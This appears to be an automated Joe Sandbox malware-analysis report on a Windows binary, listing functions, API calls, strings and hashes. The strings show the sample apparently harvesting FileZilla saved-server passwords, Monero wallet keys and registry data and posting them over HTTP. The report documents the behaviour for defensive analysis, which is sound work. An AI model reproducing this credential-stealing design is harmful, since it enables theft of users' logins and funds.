Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 67449121c150dd7ca3f165ee3686514a83a8d395a40de40178df454b1ba0ecb0
Instruction ID: aa6052a7bf85e9c66f2a895f4534a4cf1f3c4e364ad9313baa4e622647fcfe21
Opcode Fuzzy Hash: 67449121c150dd7ca3f165ee3686514a83a8d395a40de40178df454b1ba0ecb0
Instruction Fuzzy Hash: 42D11C72D00208ABCB04EBF4DD96EEE7778AF94300F544518F142B7195EE74AA4ADF62

Function 00925100 Relevance: 49.6, APIs: 19, Strings: 9, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849

lstrlen.KERNEL32(00000000), ref: 00925193

Part of subcall function 00938EA0: CryptBinaryToStringA.CRYPT32(00000000,00925184,40000001,00000000,00000000,?,00925184), ref: 00938EC0

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00925207
StrCmpCA.SHLWAPI(?,006FE9D8), ref: 00925225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00925340
HttpOpenRequestA.WININET(00000000,006FE988,?,006FE400,00000000,00000000,00400100,00000000), ref: 009253A4

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,006FEAD8,00000000,?,006FA730,00000000,?,009419DC,00000000,?,009351CF), ref: 00925737
lstrlen.KERNEL32(00000000), ref: 0092574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0092575C
RtlAllocateHeap.NTDLL(00000000), ref: 00925763
lstrlen.KERNEL32(00000000), ref: 00925778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009257A9
lstrlen.KERNEL32(00000000), ref: 009257C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009257E1
lstrlen.KERNEL32(00000000,?,?), ref: 0092580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00925822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0092584D
InternetCloseHandle.WININET(00000000), ref: 009258B1
InternetCloseHandle.WININET(00000000), ref: 009258BE
InternetCloseHandle.WININET(00000000), ref: 009258C8

Strings

", xrefs: 009255C4
", xrefs: 00925706
--, xrefs: 00925280
------, xrefs: 009253B7
------, xrefs: 00925297
------, xrefs: 009254F9
------, xrefs: 0092563B
ho, xrefs: 00925458
", xrefs: 00925482

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$ho
API String ID: 1224485577-2798176622
Opcode ID: 89e8786496e789588dd04435127c1138d092b769c1f7329cc2c834e857c54fe2
Instruction ID: 1c78b5f00c64b73f0dd95bb2048189a9ee05f7d1f825a59f98709a8c9297af8b
Opcode Fuzzy Hash: 89e8786496e789588dd04435127c1138d092b769c1f7329cc2c834e857c54fe2
Instruction Fuzzy Hash: 78321D72920118ABDB14EBA0DC91FEEB378BF94700F404199F146B3092EF746A49CF66

Function 00925960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009259F8
StrCmpCA.SHLWAPI(?,006FE9D8), ref: 00925A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00925B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,006FEA78,00000000,?,006FA730,00000000,?,00941A1C), ref: 00925E71
lstrlen.KERNEL32(00000000), ref: 00925E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00925E93
RtlAllocateHeap.NTDLL(00000000), ref: 00925E9A
lstrlen.KERNEL32(00000000), ref: 00925EAF
lstrlen.KERNEL32(00000000), ref: 00925ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00925EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00925F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00925F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00925F4C
InternetCloseHandle.WININET(00000000), ref: 00925FB0
InternetCloseHandle.WININET(00000000), ref: 00925FBD
HttpOpenRequestA.WININET(00000000,006FE988,?,006FE400,00000000,00000000,00400100,00000000), ref: 00925BF8

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

InternetCloseHandle.WININET(00000000), ref: 00925FC7

Strings

xo, xrefs: 00925DED
", xrefs: 00925E16
", xrefs: 00925CD5
------, xrefs: 00925A96
------, xrefs: 00925D4C
------, xrefs: 00925C0B
ho, xrefs: 00925CAC

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$ho$xo
API String ID: 874700897-1559205946
Opcode ID: a421f47c14335a0fbae898ef715bd33375c77af1f76309e2a6795e356ffe90c8
Instruction ID: 322ae1c83e59205eac5272ecccc43ce210d646dd4457d2439f52713e3406d200
Opcode Fuzzy Hash: a421f47c14335a0fbae898ef715bd33375c77af1f76309e2a6795e356ffe90c8
Instruction Fuzzy Hash: DE12CD72820118AADB15EBA0DC95FEEB378BF94700F5041A9F146B3091EF746E49CF66

Function 0092A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093AA70: StrCmpCA.SHLWAPI(006F8ED8,0092A7A7,?,0092A7A7,006F8ED8), ref: 0093AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0092AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0092ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092A8B0

Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

lstrcat.KERNEL32(?,00000000), ref: 0092ACEB
lstrcat.KERNEL32(?,00941320), ref: 0092ACFA
lstrcat.KERNEL32(?,00000000), ref: 0092AD0D
lstrcat.KERNEL32(?,00941324), ref: 0092AD1C
lstrcat.KERNEL32(?,00000000), ref: 0092AD2F
lstrcat.KERNEL32(?,00941328), ref: 0092AD3E
lstrcat.KERNEL32(?,00000000), ref: 0092AD51
lstrcat.KERNEL32(?,0094132C), ref: 0092AD60
lstrcat.KERNEL32(?,00000000), ref: 0092AD73
lstrcat.KERNEL32(?,00941330), ref: 0092AD82
lstrcat.KERNEL32(?,00000000), ref: 0092AD95
lstrcat.KERNEL32(?,00941334), ref: 0092ADA4
lstrcat.KERNEL32(?,00000000), ref: 0092ADB7
lstrlen.KERNEL32(?), ref: 0092AE0D
lstrlen.KERNEL32(?), ref: 0092AE1C

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

DeleteFileA.KERNEL32(00000000), ref: 0092AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0092ABD4

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 5a08bfd6ac6d9c5ad24a22f85af58c18651bfe9418ed055c1790baea2c133b89
Instruction ID: c7653139e122ae3ef43f63724979fd01255bdaaebd103db6f9f9c6a47c1b295f
Opcode Fuzzy Hash: 5a08bfd6ac6d9c5ad24a22f85af58c18651bfe9418ed055c1790baea2c133b89
Instruction Fuzzy Hash: 52120D72910108ABCB08EBA0DD96FEE7379AF94301F504158F547B70A1DE75AE09CF66

Function 0092CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,006FA970,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 00938B86

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0092D0CE
lstrcat.KERNEL32(?,00000000), ref: 0092D208
lstrcat.KERNEL32(?,00941478), ref: 0092D217
lstrcat.KERNEL32(?,00000000), ref: 0092D22A
lstrcat.KERNEL32(?,0094147C), ref: 0092D239
lstrcat.KERNEL32(?,00000000), ref: 0092D24C
lstrcat.KERNEL32(?,00941480), ref: 0092D25B
lstrcat.KERNEL32(?,00000000), ref: 0092D26E
lstrcat.KERNEL32(?,00941484), ref: 0092D27D
lstrcat.KERNEL32(?,00000000), ref: 0092D290
lstrcat.KERNEL32(?,00941488), ref: 0092D29F
lstrcat.KERNEL32(?,00000000), ref: 0092D2B2
lstrcat.KERNEL32(?,0094148C), ref: 0092D2C1
lstrcat.KERNEL32(?,00000000), ref: 0092D2D4
lstrcat.KERNEL32(?,00941490), ref: 0092D2E3

Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885

lstrlen.KERNEL32(?), ref: 0092D32A
lstrlen.KERNEL32(?), ref: 0092D339

Part of subcall function 0093AA70: StrCmpCA.SHLWAPI(006F8ED8,0092A7A7,?,0092A7A7,006F8ED8), ref: 0093AA8F

DeleteFileA.KERNEL32(00000000), ref: 0092D3B4

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 08d6a55bda2b8ad0ac3be4134d20c11f139bdc5ecf04d9e04e69dab0c2ebceb3
Instruction ID: f70f387339ecc672bec9b40ee402ba1e09e30a8656903568317fe8f35ef12bd5
Opcode Fuzzy Hash: 08d6a55bda2b8ad0ac3be4134d20c11f139bdc5ecf04d9e04e69dab0c2ebceb3
Instruction Fuzzy Hash: 25E1F972910108ABCB04EBA0DD96FEE7379AF94301F104158F147B70A1DE79AE0ADF66

Function 00938320 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

RegOpenKeyExA.KERNEL32(00000000,006FB778,00000000,00020019,00000000,009405B6), ref: 009383A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
wsprintfA.USER32 ref: 00938459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0093847B
RegCloseKey.ADVAPI32(00000000), ref: 0093848C
RegCloseKey.ADVAPI32(00000000), ref: 00938499

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Strings

?, xrefs: 0093837A
Po, xrefs: 009384DF
- , xrefs: 009385A3
%s\%s, xrefs: 0093844D

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
